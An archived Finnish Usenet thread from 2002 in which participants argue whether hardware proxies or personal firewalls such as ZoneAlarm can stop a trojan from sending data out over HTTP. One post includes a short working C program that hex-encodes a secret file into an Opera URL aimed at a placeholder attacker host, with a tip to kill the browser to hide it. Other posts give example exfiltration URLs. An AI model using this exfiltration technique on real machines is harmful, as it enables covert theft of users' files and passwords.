proxy voidaan periaatteessa säätää vaikkapa pudottamaan jokainen get, jossa
yritetään välittää yli 25merkkiä tietoa.
Toki tuolla 25:lläkin merkillä voidaan välittää tietoa, mutta koko homman
pointti on se, että sekin on estettävissä, jos se katsotaan tarpeelliseksi.
En tosin usko, että missään on moista katsottu tarpeelliseksi.
Ja jos oikein pilkkua nussitaan, niin tietoa toki voisi lähettää vaikkapa
muodossa "GET /salasana.html HTTP/1.0", joka alkaa olla siinä rajoilla,
että sen estäminen alkaa olla melkein mahdotonta, mutta tätä ennen ZAP on
pudonnut kelkasta jo ajat sitten.
En yritä tässä todistaa, että proxy-firewall on täydellinen suoja, ei
tietenkään ole, koska täydellistä suojaa ei ole olemassakaan. Mutta se on
kuitenkin paras olemassaoleva & muokattavin suoja. Ja sitäkin enemmän
koitan vielä osoittaa sinulle, että ZAP ei tarjoa mitään mitä oikein
suunniteltu ja toteutettu ulkoinen muuri ei osaisi.
Sillä siitähän tämä koko ketju lähti, sinä väitit että koneesta jossa
on ZAP on mahdotonta lähettää tietoa ulos, kun taas ulkoisesta
palomuurista suhahtavat tuhannet ohjelmat läpi noin vain.
Ari Laitinen
"Sauli Luoto" <slu...@maa1.cc.lut.fi> kirjoitti viestissä
news:slrnagl0pk...@maa1.cc.lut.fi...
> > 3) Pointtina on että troijalainen tietokoneessa nappaa salasanoja
talteen ja
> > tallettaa niitä johonkin ja sitten lähettää ne matkaan rautapalomuurin
> > läpi...toki voidaan troijalainen ohjelmoida lähettämään mitä tahansa
> > tiedostoja tai keräämään mitä tahansa tietoja ja lähettämään ne.
>
> Niin, tuossa kysymysmerkin jälkeen voisi lukea vaikka sinun salasanasi,
> niin se lähetetään ZAP:n läpi.
>
> Miten ne salasanat lähetetään tiukasti konffatun rautapalomuurin läpi, kun
> liikenne ohjataan http-proxyn läpi, joka tiputtaa edellä kuvatut pyynnöt?
Salasana olkoon pwrd
Vakoojan domain olkoon spy.fi
Haittaohjelma avaa www sivun osoitteesta http://www.spy.fi/pwrd
Jori Mantysalo
> - Mikään rautapalomuuri ei voi estää troijalaista tietokoneelta
> lähettämästä dataa ulos esimerkiksi portista 80 (tai muusta mikä on
> jätetty auki, 80 on varmaan kaikissa auki)...ja tarkennetaan nyt
> sitten...jos se vain leikkii http protokollaa.
Kauhea tappelu asiasta, joka lienee aika yksinkertainen:
1. Erillinen palomuurikone ei voi tosiaan estää esimerkiksi kymmenen
tavun lähettämistä päivässä portin 80 kautta. Tämä onnistuu, olipa
estoja sitten millaisia vain, esimerkiksi hakemalla tavallisella
HTTP-protokollan mukaisella pyynnöllä koneelta www.evil.example
sivua "foobar1234". Tällöin merkkijono "foobar1234" siirtyy ilkeälle
kräkkerille. Rautapalomuuri voi yrittää estää tätä kieltämällä yhteydet
tietyille tunnetuille "pahoille koneille", mutta tällöin pitäisi
jatkuvasti päivittää listaa kielletyistä koneista.
2. Erillinen palomuurikone voi kyllä rajoittaa päivässä kulkevan datan
vaikka kymmeneen kilotavuun per ilkeän kräkkerin domain. Lasketaan
osoitteista mallia
http://data1.data2.evil.example/data3/data4
yhteen ne osat, jotka voivat sisältää vuotavaa dataa (tässä esimerkissä
merkkijonon "data1.data2" ja merkkijonon "data3/data4" pituudet
yhteenlaskettuna) ja estetään liikenne jos tämä data ylittää kymmenen
kilotavua. En näe mitään estettä tuollaisen toteuttamiselle.
Erillinen palomuuri siis ei voi estää datavuotoa koneelta ulos, jos
työasemassa on päässyt ilkeän kräkkerin ohjelma käynnistymään, mutta
se voi olennaisesti haitata haittaohjelmien toimintaa.
--
"Syömisen pitää olla FIFO ja pitää varoa ettei siitä tule LIFO."
-- TP, syö-niin-paljon-kuin-jaksat -ravintolassa
Kai Puolamaki
> Tiedostojen lähettäminen suoraan ei onnistu koska Opera kysyy
> varmistuksen että haluaako käyttäjä siirtää tiedoston X
> palvelimelle.
Olet väärässä. Sen jälkeen kun olet antanut Operallesi luvan muodostaa
HTTP-yhteyksiä, lähettää seuraavan tyyppinen ohjelma mielivaltaisen
tiedoston mielivaltaiselle palvelimelle Internettiin ilman että
palomuuri varoittaa asiasta mitään:
/* jansson.c */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
main(){int i,j;char s[600];strcpy(s,"opera -remote \"openURL(http://paha.pal"\
"velin.example/?");j=strlen(s);i=getchar();while(i!=EOF&&j<500){sprintf(&s[j],
"%02X",(unsigned char)i);i=getchar();j+=2;}strcpy(&s[j], ")\"");system(s);}
% gcc jansson.c -o jansson
% ./jansson < salainen_tiedosto.dat
Tämä on myös mahdollista toteuttaa siten, että käyttäjä ei huomaa
mitään. Triviaaleintä on tappaa selainprosessi heti tuon jälkeen
(Wintööt-vastine komennolle "killall opera"), jolloin näyttää siltä,
että selain kaatui, tai sitten voi käyttää esim. sivulla
http://tooleaky.zensoft.com/ kuvattuja menetelmiä.
--
http://www.iki.fi/kaip/
Puolusta sähköisiä oikeuksiasi. Liity Electronic Frontier Finlandin
jäseneksi. http://www.effi.org/
Markus Jansson
> > > Rautaa tarvitaan rajalla jotta paikallisiin verkkoresursseihin ei pääse
> > > kiinni muualta. Näitä kun ei voi rajoittaa MS:n tuotteissa kovinkaan
> > > luontevasti muuten.
> >
> > Tyhmä kysymys mutta NTFS???
>
> Mitä siitä? Pitäisikö minun sanoa tähän vaikka FAT32 tai Reiser FS?
Eikös NTFS:llä voi asettaa oikeudet siten että ainostaan tietty oikeutettu
käyttäjä pääsee tiettyyn resurssiin käsiksi? Silloin siihen ei pääse kukaan
netin kautta olematta tuo tietty käyttäjä.
> Silti systeemi on pommi rautaan verrattuna vaikka olisi kalliimpi.
Pommi? Luotettavampi se ainakin on siinä suhteessa että koneelta ei
pääse mitä tahansa nettiin kunhan käyttää http protokollaa.
> Jos koneet ovat klooneja niin ei ne mitään palomuureja tarvitse. Niihin
> voidaan kloonata riittävät käyttörajoittimet muutenkin ja kaikki pahat
> ohjelmat hävitetään kloonaamalla systeemi joka yö serveriltä uudelleen.
Mutta entäs sen päivän aikana....
Markus Jansson
> Kuten olen jo, toistuvasti, kertonut http-proxy suodattaa ne pois
> ennenkuin ne menevät varsinaiseen pakettisuodattimeen. Onko näistä
> edellisistä sanoista sinulle outo http, proxy vaiko pakettisuodatin. Vai
> peräti jokainen? Jotainhän tässä on oltava takana, kun et ymmärrä mitä
> sinulle sanotaan.
Mitkä suodattaa pois? Miten? Mistä se tietää? Ei mistään.
Kerro minulle miten on mahdollista suodattaa troijalaisen portin 80 kautta
http mukaan tekemä liikenne jossa se lähettää vaikka salasanoja tai muuta
kaappaamaansa silloin tällöin? Johan se myönnettiin että se ei ole
mahdollista.
> Olen kertonut sinulle tämänkin jo pariin kertaan, mutta otetaanpa vielä
> kertauksen vuoksi yksi kierros. Palomuuri ei tee sillä ohjelman nimellä
> mitään, koska se suodattaa liikennettä sisällön,
Eli http prokollan mukaan jota troijalainen käyttää lähettäessään tietojaan
jonnekin. Eli päästää läpi.
> kohteen
Et voi tietää mihin kohteeseen troijalainen on ohjelmoitu ottamaan yhteyttä
joten läpi pääsee.
> ja yhteystyypin mukaan.
No se on se http protokolla portista 80. Eli läpi menee jotta vingahtaa.
Markus Jansson
wrote:
> Olet väärässä. Sen jälkeen kun olet antanut Operallesi luvan muodostaa
> HTTP-yhteyksiä, lähettää seuraavan tyyppinen ohjelma mielivaltaisen
> tiedoston mielivaltaiselle palvelimelle Internettiin ilman että
> palomuuri varoittaa asiasta mitään:
Ei varmasti lähetä ilman että Opera ilmoittaa mitään. Muuten se olisi ns.
tietoturva-aukko.
> Tämä on myös mahdollista toteuttaa siten, että käyttäjä ei huomaa
> mitään. Triviaaleintä on tappaa selainprosessi heti tuon jälkeen
> (Wintööt-vastine komennolle "killall opera"), jolloin näyttää siltä,
> että selain kaatui, tai sitten voi käyttää esim. sivulla
> http://tooleaky.zensoft.com/ kuvattuja menetelmiä.
Joo noihan on noita joista yksikään ei pääse nykyisen ZoneAlarmin läpi.
Testattu on ja huomattu että ei toimi. Testaa toki itse jos et minua usko.
Markus Jansson
wrote:
> Tärkeintähän on kuitenkin estää pahoja viruksia tulemasta pahasta
> internetistä omalle tietokoneeseen.
>
> Rautapalomuuri tekee tämän työn kunnialla ja estää pahat yhteydenotot.
> Softapalomuuri sen sijaan päästää kaikki pahan ja tuhmat internet ilkiöt
> koneelle asti ennenkuin viime tingassa yrittää ehtiä pelastamaan sen mitä
> pelastettavissa on.
Millä perusteella muka? Softapalomuuri voi myös, kuten yleensä tekeekin,
sulkea portteja joten ulkoa ei sisäänpäin tulla.
Markus Jansson
> Lopputuloksen kannalta sillä ei ole mitään merkitystä mikä ohjelma ne
> tiedot sinne nettiin on lähettänyt.
On sikäli tosin että troijalainen itse voidaan havaita jos se koettaa lähettää
jotakin itse nettiin eikä käytä jotakin muuta ohjelmaa. Jos henkilökohtaiseen
palomuuriin kolahtaa backdoor.exe joka haluaa lähettää jotaki kökköä
portista 80 niin...
> Lue faktaa ja arvaa uudelleen kuinka monella tavalla ulospäin voi jutella
> http-protokollalla. Vihje, se on yksinkertainen protokolla.
> Kerrotko muuten vielä missä kohtaa sanoin, että estäisin jonkun niistä
> tavoista, sanoin että tarvittaessa voidaan kieltää esimerkkini mukaiset
> GET:it, jolla lähetetään mahdollisesti tietoa palvelimelle.
Jonkun niistä tavoista? Kerro mitä tapahtuu jos estät KAIKKI ne tavat?
> Koska liikenne kulkee http-proxyn kautta, niin ulkomaailmaan ei ole
> suoraan mikään auki. Sinulle ei ole todella tainnut valjeta mikä on proxy?
No korjataan. Kun jokin liikenne PROXYN kautta on olemassa ja
mahdollinen, etkä voi tietää MIKÄ ohjelma sitä käyttää rautapalomuurissa
niin et voi estää jotakin ohjelmaa välittämästi jotakin tietoa tiettyä porttia ja
prokollaa käyttämällä.
> Mikä estää tekemästä sellaista ohjelmaa, joka lähettää tuon vain kun
> opera on käynnissä, jolloin sitä ei huomaa?
Totta, ei periaatteessa mikään. Eikö se muka näy Operassa uutena
ikkunana? Jos näkyy niin sitten kiinnijäämisen riski on melkoinen.
> Miten ne salasanat lähetetään tiukasti konffatun rautapalomuurin läpi,
> kun liikenne ohjataan http-proxyn läpi, joka tiputtaa edellä kuvatut
> pyynnöt?
Käyttämällä sellaista tapaa jota http-proxy ei tiputa.
Markus Jansson
@uta.fi> wrote:
> Erillinen palomuuri siis ei voi estää datavuotoa koneelta ulos, jos
> työasemassa on päässyt ilkeän kräkkerin ohjelma käynnistymään, mutta
> se voi olennaisesti haitata haittaohjelmien toimintaa.
Aamen!
Aivan kuten voi "henkilökohtainen palomuurikin", tosin sillä erolla että se
pitää suorittaa silloin kun käyttäjä itse käyttää esim. selaintaan ja saada
vielä tapahtumaan käyttäjältä näkymättämästi.
Markus Jansson
> En yritä tässä todistaa, että proxy-firewall on täydellinen suoja, ei
> tietenkään ole, koska täydellistä suojaa ei ole olemassakaan. Mutta se on
> kuitenkin paras olemassaoleva & muokattavin suoja. Ja sitäkin enemmän
> koitan vielä osoittaa sinulle, että ZAP ei tarjoa mitään mitä oikein
> suunniteltu ja toteutettu ulkoinen muuri ei osaisi.
ZAP tarjoaa mahdollisuuden estää muita kuin haluttuja ohjelmia ottamasta
yhteyttä nettiin. ZAP:sta voi mennä läpi ainoastaan käyttämällä hyväkseen
olemassa olevia ja nettiin päästettyjä ohjelmia. Lisäksi ZAP voidaan pitää
kirjaa siitä MITÄ ohjelmia on yrittänyt mennä nettiin eli havaita sinne yrittäviä
troijalaisia (niitäkin jotka käyttävät porttia 80) helpostikin.
> Sillä siitähän tämä koko ketju lähti, sinä väitit että koneesta jossa
> on ZAP on mahdotonta lähettää tietoa ulos, kun taas ulkoisesta
> palomuurista suhahtavat tuhannet ohjelmat läpi noin vain.
Itse asiassa taisin väittää että ZAP:sta ei ole mahdollista haittaohjelman
ottaa yhteyttä ulos kun taas ulkoisesta palomuurista sellainen ohjelma
pääsee läpi jos käyttää sopivaa protokollaa ja porttia. Näinhän asian laita
on. ZAP:sta pääsee läpi vain käyttämällä hyväkseen olemassa olevaa
ohjelmaa jolla on lupa päästä nettiin mutta sekin pitää tehdä silloin kun
käyttäjä itse käyttää ohjelmaa ja siten että käyttäjä ei siltikään huomaa
mitään outoa selaimen puuhaavan.
Sami Rautiainen
>> Olet väärässä. Sen jälkeen kun olet antanut Operallesi luvan muodostaa
>> HTTP-yhteyksiä, lähettää seuraavan tyyppinen ohjelma mielivaltaisen
>> tiedoston mielivaltaiselle palvelimelle Internettiin ilman että
>> palomuuri varoittaa asiasta mitään:
> Ei varmasti lähetä ilman että Opera ilmoittaa mitään.
Aivan varmasti lähettää. On mahdollista tehdä html -sivu ja siihen skripti
joka lähettää esimerkiksi salasanasi kauas pois. Tälläisellä kun korvaa
vaikkapa selaimesi aloitussivun, niin kas, ei Zone Alarm estänytkään
tietovuotoa.
> Muuten se olisi ns. tietoturva-aukko.
Jokainen ohjelma joka pääsee verkkoon on tässä mielessä tietoturva-aukko.
Puhumattakaan siitä mahdollisuudesta, että ilkeä ohjelma rampauttaa Zone
Alarmin ennen yhteyden avaamista.
--
The suespammers.org mail server is located in California, USA;
do not send unsolicited bulk e-mail or unsolicited commercial
e-mail to my suespammers.org address.
Kai Puolamaki
> On 15 Jun 2002 13:32:41 +0300, Kai Puolamaki <Kai.Pu...@iki.fi>
> wrote:
> > Olet väärässä. Sen jälkeen kun olet antanut Operallesi luvan muodostaa
> > HTTP-yhteyksiä, lähettää seuraavan tyyppinen ohjelma mielivaltaisen
> > tiedoston mielivaltaiselle palvelimelle Internettiin ilman että
> > palomuuri varoittaa asiasta mitään:
>
> Ei varmasti lähetä ilman että Opera ilmoittaa mitään. Muuten se olisi ns.
> tietoturva-aukko.
Se on "tietoturva-aukko" vain niille, jotka ovat tarpeeksi naiveja
olettaakseen, että "henkilökohtaisten palomuurien" pitäisi pystyä
varmasti estämään haittaohjelmien kommunikointi ulkomaailman kanssa.
Ymmärsitköhän ollenkaan mitä artikkeliini liittämä lyhyt ohjelmanpätkä
tekee? Voisitko omin sanoin esittää sen toiminnan?
Ari Laitinen
> On Sat, 15 Jun 2002 01:32:26 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > > > Rautaa tarvitaan rajalla jotta paikallisiin verkkoresursseihin ei
pääse
> > > > kiinni muualta. Näitä kun ei voi rajoittaa MS:n tuotteissa kovinkaan
> > > > luontevasti muuten.
> > >
> > > Tyhmä kysymys mutta NTFS???
> >
> > Mitä siitä? Pitäisikö minun sanoa tähän vaikka FAT32 tai Reiser FS?
>
> Eikös NTFS:llä voi asettaa oikeudet siten että ainostaan tietty oikeutettu
> käyttäjä pääsee tiettyyn resurssiin käsiksi? Silloin siihen ei pääse
kukaan
> netin kautta olematta tuo tietty käyttäjä.
Mutta resurssin olemassaolo paljastuu ja sitä voi yrittää murtaa
tuomiopäivään asti. Microsoftin alkuperäinen salasanasuojaus perustui
siihen, että client asema tarkastaa onko sillä oikeus lukea ja kirjoittaa
resurssia. Tällä logiikalla toimivat yrityksen tuotteisiin ei voi laittaa
luottamusta lainkaan kun koko ajan paljastuu mitä ihmeellisempiä PnP ja IIS
turvavirheitä.
> > Silti systeemi on pommi rautaan verrattuna vaikka olisi kalliimpi.
>
> Pommi? Luotettavampi se ainakin on siinä suhteessa että koneelta ei
> pääse mitä tahansa nettiin kunhan käyttää http protokollaa.
Kaikki systeemit on pommeja jos käyttäjä voi tehdä virheen. Murpyn lain
mukaan näin tulee tapahtumaan. Siksi kyse on pommista. Se odottaa vain
laukeamista.
> > Jos koneet ovat klooneja niin ei ne mitään palomuureja tarvitse. Niihin
> > voidaan kloonata riittävät käyttörajoittimet muutenkin ja kaikki pahat
> > ohjelmat hävitetään kloonaamalla systeemi joka yö serveriltä uudelleen.
>
> Mutta entäs sen päivän aikana....
Ei paljon vaikuta. Jos koneisiin tulee jotain tuhmaa niin se lähtee taas
seuraavana yönä pois itsestään.
Ari Laitinen
> On Sat, 15 Jun 2002 01:38:01 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > Tärkeintähän on kuitenkin estää pahoja viruksia tulemasta pahasta
> > internetistä omalle tietokoneeseen.
> >
> > Rautapalomuuri tekee tämän työn kunnialla ja estää pahat yhteydenotot.
> > Softapalomuuri sen sijaan päästää kaikki pahan ja tuhmat internet ilkiöt
> > koneelle asti ennenkuin viime tingassa yrittää ehtiä pelastamaan sen
mitä
> > pelastettavissa on.
>
> Millä perusteella muka? Softapalomuuri voi myös, kuten yleensä tekeekin,
> sulkea portteja joten ulkoa ei sisäänpäin tulla.
Paha ohjelma on jo koneessa ennenkuin se voidaan poistaa softapalomuurilla.
Softapalomuuri ei voi tunnistaa uhkaa ennenkuin tietokone on vastaanottanut
paketin, jossa uhka on.
Joko alkaa pöksyt tutista?
Markus Jansson
wrote:
> Mutta resurssin olemassaolo paljastuu ja sitä voi yrittää murtaa
> tuomiopäivään asti.
Jos se on hyvin suojattu, sitä tosiaan saa yrittää murtaa tuomiopäivään asti.
Vertaa salaukseen: hyvä salaus on sellainen josta vastapuoli saa tietää
aivan kaiken paitsi salausavaimen...eikä silti saa viestiä auki. SE on
turvallisuutta.
> Ei paljon vaikuta. Jos koneisiin tulee jotain tuhmaa niin se lähtee taas
> seuraavana yönä pois itsestään.
Kun on jo yhtenä päivänä ehtinyt kerätä käyttäjien salasanat jne. talteen ja
lähettänyt ne hakkerille. No mitäpä sillä ohjelmalla enää sitten paljon
tekisikään...
Markus Jansson
wrote:
> Softapalomuuri ei voi tunnistaa uhkaa ennenkuin tietokone on
> vastaanottanut paketin, jossa uhka on.
Ja merkitys on missä? Kun softapalomuuri torjuu sen niin....niin?
Markus Jansson
wrote:
> Ymmärsitköhän ollenkaan mitä artikkeliini liittämä lyhyt ohjelmanpätkä
> tekee? Voisitko omin sanoin esittää sen toiminnan?
En täysin ymmärtänyt mutta edelleenkin toistan: jos se kykenisi lähettämään
tiedoston Operan kautta ilman että minä tiedän siitä mitään se tarkoittaa
että Operassa olisi tietoturva-aukko.
Markus Jansson
> Aivan varmasti lähettää. On mahdollista tehdä html -sivu ja siihen skripti
> joka lähettää esimerkiksi salasanasi kauas pois. Tälläisellä kun korvaa
> vaikkapa selaimesi aloitussivun, niin kas, ei Zone Alarm estänytkään
> tietovuotoa.
Ai että lähettää minun koneestani tiedoston ulkomaailmaan ilman että
Opera kysyy mitään? Operassa oli kyllä vähän aikaa sitten aukko (6.00 ja
6.01 ja 6.02 versioissa) joka mahdollisti tiedoston siirtämisen tietokoneesta
ilman että käyttäjältä kysyttiin mitään.
> Puhumattakaan siitä mahdollisuudesta, että ilkeä ohjelma rampauttaa
> Zone Alarmin ennen yhteyden avaamista.
Millä helevetillä se sen tekee kun ei pääse kirjoittamaan ko. kansioihin (siis
jos systeemi on oikein konfiguroitu)?
Ari Laitinen
> On Sat, 15 Jun 2002 20:15:50 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > Mutta resurssin olemassaolo paljastuu ja sitä voi yrittää murtaa
> > tuomiopäivään asti.
>
> Jos se on hyvin suojattu, sitä tosiaan saa yrittää murtaa tuomiopäivään
asti.
> Vertaa salaukseen: hyvä salaus on sellainen josta vastapuoli saa tietää
> aivan kaiken paitsi salausavaimen...eikä silti saa viestiä auki. SE on
> turvallisuutta.
Vaan turvallisuus jää taas kerran koneen käyttäjän varaan ja siihen luottaen
salasanoista ei ole hyötyä.
> > Ei paljon vaikuta. Jos koneisiin tulee jotain tuhmaa niin se lähtee taas
> > seuraavana yönä pois itsestään.
>
> Kun on jo yhtenä päivänä ehtinyt kerätä käyttäjien salasanat jne. talteen
ja
> lähettänyt ne hakkerille. No mitäpä sillä ohjelmalla enää sitten paljon
> tekisikään...
Jos olisi tarkoitus tehdä sellainen systeemi, joka lähettää vain salasanat
niin kyllä se onnistuu oli palomuuri tai ei.
Ari Laitinen
> On Sat, 15 Jun 2002 20:19:43 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > Softapalomuuri ei voi tunnistaa uhkaa ennenkuin tietokone on
> > vastaanottanut paketin, jossa uhka on.
>
> Ja merkitys on missä? Kun softapalomuuri torjuu sen niin....niin?
Se on psykologisesti arveluttavaa :-)
Ari Laitinen
> On 15 Jun 2002 19:32:22 +0300, Kai Puolamaki <Kai.Pu...@iki.fi>
> wrote:
> > Ymmärsitköhän ollenkaan mitä artikkeliini liittämä lyhyt ohjelmanpätkä
> > tekee? Voisitko omin sanoin esittää sen toiminnan?
>
> En täysin ymmärtänyt mutta edelleenkin toistan: jos se kykenisi
lähettämään
> tiedoston Operan kautta ilman että minä tiedän siitä mitään se tarkoittaa
> että Operassa olisi tietoturva-aukko.
No nyt kun sinulle kävi selväksi että operassa on tietoturva-aukko niin
miten nyt suhtaudut siihen asiaan että saako koneessa ajaa tuntemattomia
ohjelmia jos on palomuuri vai eikö saa?
Sauli Luoto
> ZAP tarjoaa mahdollisuuden estää muita kuin haluttuja ohjelmia ottamasta
> yhteyttä nettiin.
Mitä sillä ohjelmalla on väliä, jos se tieto kuitenkin menee eteenpäin?
> ZAP:sta voi mennä läpi ainoastaan käyttämällä hyväkseen
> olemassa olevia ja nettiin päästettyjä ohjelmia. Lisäksi ZAP voidaan pitää
> kirjaa siitä MITÄ ohjelmia on yrittänyt mennä nettiin eli havaita sinne yrittäviä
> troijalaisia (niitäkin jotka käyttävät porttia 80) helpostikin.
Mutta taas ne ohjelmat, jotka ovat sallittuja voivat lähettää sinne
käytännössä mitä tahansa tietoa, eikä mitenkään voida kontrolloida mikä
ohjelma avaa esim. sen uuden ikkunan selaimeen. Ja tietoturvahan on juuri
niin vahva kuin heikoin lenkki.
> Itse asiassa taisin väittää että ZAP:sta ei ole mahdollista haittaohjelman
> ottaa yhteyttä ulos kun taas ulkoisesta palomuurista sellainen ohjelma
> pääsee läpi jos käyttää sopivaa protokollaa ja porttia. Näinhän asian laita
> on. ZAP:sta pääsee läpi vain käyttämällä hyväkseen olemassa olevaa
> ohjelmaa jolla on lupa päästä nettiin mutta sekin pitää tehdä silloin kun
> käyttäjä itse käyttää ohjelmaa ja siten että käyttäjä ei siltikään huomaa
> mitään outoa selaimen puuhaavan.
--lainaus--
Tosin, tällä hetkellä ei ole olemassa yhtään ohjelmaa joka voisi mennä esim.
minun ZAP:stani läpi nettiin välittämään tietoa minun tietämättäni. Sen
sijaan on tuhansia ohjelmia jotka viuhahtavat ulkoisesta palomuurista läpi
välittämään tietoa käyttäjien tietämättä.
--loppu--
Väitätkö edelleen, että ZAP:isi läpi ei voi mikään ohjelma lähettää
tietoja? Tässä ketjussa on parikin tapaa siihen esitetty, jotka tosin
purevat myös niihin oikeisiin palomuureihin, jollei niitä ole konffattu
täysin paranoideiksi. (ts. proxylle on annettu valmiiksi lista sallituista
osoitteista, jotka on todettu turvallisiksi. Näin itseasiassa muuten
myös tehdään ainakin yhdessä tietämässäni firmassa, vaikkakin pidän sitä
siinä tapauksessa melko liioitteluna.)
Sami Rautiainen
> Ai että lähettää minun koneestani tiedoston ulkomaailmaan ilman että
> Opera kysyy mitään?
Ei sen varsinaisesti tiedostoa tarvitse lähettää. Tietoahan koneestasi
lähtee ulospäin esimerkiksi joka kerta kun täytät webissä olevan lomakkeen.
Tai valitset linkin. Tai lähetät sähköpostia. Tai postaat nyysseihin. Tai..
Pointtina on se, että jos avaat pääsyn verkkoon mille tahansa ohjelmalle,
sitä ohjelmaa voidaan käyttää tiedon vuotamiseen ulospäin. Vähään samaan
tapaan, kun jos rautapalomuurissa avataan portti Z, niin haittaohjelma voi
liikennöidä portin Z kautta.
[..]
>> Puhumattakaan siitä mahdollisuudesta, että ilkeä ohjelma rampauttaa
>> Zone Alarmin ennen yhteyden avaamista.
> Millä helevetillä se sen tekee kun ei pääse kirjoittamaan ko. kansioihin (siis
> jos systeemi on oikein konfiguroitu)?
Windowssissa on ennenkin ollut lokaaleja reikiä, joilla saadaan admin- tai
system-oikeudet.
Jos haittaohjelma pääsee käynnistymään koneessasi, et tiedä mitä on
tapahtunut, etkä voi luottaa siihen että mitään ikävää ei tapahdu. Zone
Alarm (ja vastaavat) voivat parhaimillaan pienentää aiheutuvaa vahinkoa
joissain tapauksissa, mikä tietysti on positiivista, mutta lopullinen
ratkaisu kaikkiin ongelmiin ne eivät todellakaan ole.
Panu Mantylahti
> Mitkä suodattaa pois? Miten? Mistä se tietää?
Vaikkapa niin, että dynaamisella pakettifiltterillä on tieto kielletystä
datasta. Liikenne seulotaan, ja jos kiellettyä dataa nähdään, niin
hälytetään käyttäjä.
Esimerkiksi Nortonin kotimuurille voi antaa listan arkaluontoisesta
datasta, ja muuri hälyttää kun se huomaa moista olevan lähdössä
verkkoon. Kevyen kenttäkokeen mukaan optio varoittaa luottokorttinumeron
syöttöyrityksistä myös silloin, kun numeroon höystetään väliviivoja ja
-lyöntejä.
Kovin ihmeellistä suojaa Norton ei anna, mutta periaatteessa
toiminnallisuus on ihan fiksu. Se lienee lähinnä tarkoitettu estämään
perhemikron junioreita antamasta puhelinnumeroa tai osoitetta
chattituttaville ja vastaavaan.
Tietysti tuho-ohjelma voi myös kryptata hyötykuormansa, jolloin
filtteröinnin teho heikkenee oleellisesti. Salauksen ei tarvitse olla
Cesaria kummoisempi, sillä kombinaatioita on niin monta, että kaikkia on
käytännössä mahdotonta laittaa sulkulistalle. Vasta-argumenttina on
hälytys, jos HTTP-sanomassa ei ole tarpeeksi montaa sanakirjaan sopivaa
sanaa, vaan liikaa satunnaisilta vaikuttavia merkkejä. Tämä tosin tekisi
mm. Amazonin käytöstä aika tuskaista...
-P
--
Thou shalt not follow the Null Pointer,
for at its end Madness and Chaos lie.
Ari Laitinen
> täysin paranoideiksi. (ts. proxylle on annettu valmiiksi lista sallituista
> osoitteista, jotka on todettu turvallisiksi. Näin itseasiassa muuten
> myös tehdään ainakin yhdessä tietämässäni firmassa, vaikkakin pidän sitä
> siinä tapauksessa melko liioitteluna.)
Liioittelun takana lienee usein verkon käytön estäminen eikä
turvallisuusseikat.
Markus Jansson
wrote:
> Vaan turvallisuus jää taas kerran koneen käyttäjän varaan ja siihen
> luottaen salasanoista ei ole hyötyä.
Vahvat salasanat käyttöön, minimiksi 14 merkkiä ja monimutkaisuus päälle
kanssa. Tai sitten älykortit käyttöön.
> Jos olisi tarkoitus tehdä sellainen systeemi, joka lähettää vain salasanat
> niin kyllä se onnistuu oli palomuuri tai ei.
Miten? (siis muuten kuin em. tavoilla)
Markus Jansson
> Tietysti tuho-ohjelma voi myös kryptata hyötykuormansa, jolloin
> filtteröinnin teho heikkenee oleellisesti. Salauksen ei tarvitse olla
> Cesaria kummoisempi, sillä kombinaatioita on niin monta, että kaikkia on
> käytännössä mahdotonta laittaa sulkulistalle. Vasta-argumenttina on
> hälytys, jos HTTP-sanomassa ei ole tarpeeksi montaa sanakirjaan sopivaa
> sanaa, vaan liikaa satunnaisilta vaikuttavia merkkejä. Tämä tosin tekisi
> mm. Amazonin käytöstä aika tuskaista...
Yksi sana: Steganografia. (Vittu kirjoitinko väärin no anyway...) :p
Markus Jansson
wrote:
> > Ja merkitys on missä? Kun softapalomuuri torjuu sen niin....niin?
>
> Se on psykologisesti arveluttavaa :-)
Aivan, juuri tuota hain takaa.... ;)
Markus Jansson
> Mutta taas ne ohjelmat, jotka ovat sallittuja voivat lähettää sinne
> käytännössä mitä tahansa tietoa, eikä mitenkään voida kontrolloida mikä
> ohjelma avaa esim. sen uuden ikkunan selaimeen. Ja tietoturvahan on
> juuri niin vahva kuin heikoin lenkki.
Jos uusi ikkuna avautuu, käyttäjä huomaa sen.
> Väitätkö edelleen, että ZAP:isi läpi ei voi mikään ohjelma lähettää
> tietoja?
Tällä hetkellä sellaista ohjelmaa ei ainakaan ole olemassa.
> Tässä ketjussa on parikin tapaa siihen esitetty, jotka tosin
> purevat myös niihin oikeisiin palomuureihin, jollei niitä ole konffattu
> täysin paranoideiksi. (ts. proxylle on annettu valmiiksi lista sallituista
> osoitteista, jotka on todettu turvallisiksi. Näin itseasiassa muuten
> myös tehdään ainakin yhdessä tietämässäni firmassa, vaikkakin pidän sitä
> siinä tapauksessa melko liioitteluna.)
No joo, mikäli rautapalomuuri väännetään niin paranoidiseksi että
ainoastaan yhteydet tiettyihin osoitteisiin sallitaan, sitten asia on eri.
Toisaalta, ZAP voidaan myös vääntää niin paranoidiseksi että ainoastaan
haluttuihin osoitteisiin voi ottaa yhteyttä eikä muihin...annetaan ohjemille
lupa mennä ainoastaan "Local" alueeseen ja sitten määritellään "Local"
alueeseen ne IP:t joihin yhteyden ottaminen katsotaan tarpeelliseksi.
Markus Jansson
wrote:
> No nyt kun sinulle kävi selväksi että operassa on tietoturva-aukko niin
> miten nyt suhtaudut siihen asiaan että saako koneessa ajaa
> tuntemattomia ohjelmia jos on palomuuri vai eikö saa?
Ei tietenkään saa.
Ari Laitinen
> On Sun, 16 Jun 2002 01:19:44 +0300, "Ari Laitinen" <nos...@arisoft.fi>
> wrote:
> > > Ja merkitys on missä? Kun softapalomuuri torjuu sen niin....niin?
> >
> > Se on psykologisesti arveluttavaa :-)
>
> Aivan, juuri tuota hain takaa.... ;)
Sehän riittää... on tähänkin asti riittänyt näissä turvatuotteissa.
Markus Jansson
> Pointtina on se, että jos avaat pääsyn verkkoon mille tahansa ohjelmalle,
> sitä ohjelmaa voidaan käyttää tiedon vuotamiseen ulospäin. Vähään
> samaan tapaan, kun jos rautapalomuurissa avataan portti Z, niin
> haittaohjelma voi liikennöidä portin Z kautta.
Paino sanalle vähän samaan tapaan. Sillä erolla tosin että rautapalomuurin
ohittamiseen ulospäin riittää mikä tahansa troijalainen joka käyttää porttia
